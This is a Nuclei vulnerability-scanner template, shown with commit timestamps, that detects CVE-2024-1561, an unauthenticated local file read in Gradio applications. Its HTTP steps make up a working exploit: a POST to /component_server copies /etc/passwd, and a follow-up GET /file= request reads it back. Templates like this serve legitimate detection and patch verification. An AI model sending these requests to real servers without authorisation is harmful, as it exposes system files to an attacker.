nuclei-templates/http/cves/2024/CVE-2024-1561.yaml

74 lines
2.1 KiB
YAML
Raw Normal View History

2024-05-14 17:01:40 +00:00
id: CVE-2024-1561
info:
2024-05-15 06:16:08 +00:00
name: Gradio Applications - Local File Read
2024-05-14 17:01:40 +00:00
author: Diablo
severity: high
description: |
Local file read by calling arbitrary methods of Components class
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
2024-05-31 19:23:20 +00:00
- https://www.gradio.app/changelog#4-13-0
2024-05-14 17:01:40 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
cwe-id: CWE-29
2024-05-31 19:23:20 +00:00
epss-score: 0.00087
epss-percentile: 0.36659
2024-05-14 17:01:40 +00:00
metadata:
verified: true
max-request: 3
shodan-query: html:"__gradio_mode__"
2024-05-15 06:16:08 +00:00
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
2024-05-14 17:01:40 +00:00
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
2024-05-14 17:05:12 +00:00
- |
2024-05-14 17:01:40 +00:00
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
2024-05-15 06:16:08 +00:00
{"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
2024-05-14 17:01:40 +00:00
extractors:
- type: regex
name: tmpath
2024-05-14 19:46:04 +00:00
regex:
2024-05-14 19:42:14 +00:00
- \/[a-zA-Z0-9\/]+
2024-05-14 17:01:40 +00:00
internal: true
- raw:
- |
2024-05-14 19:42:14 +00:00
GET /file={{tmpath}} HTTP/1.1
2024-05-14 17:01:40 +00:00
Host: {{Hostname}}
matchers:
2024-05-15 06:16:08 +00:00
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- 'contains(header, "text/plain")'
condition: and
# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950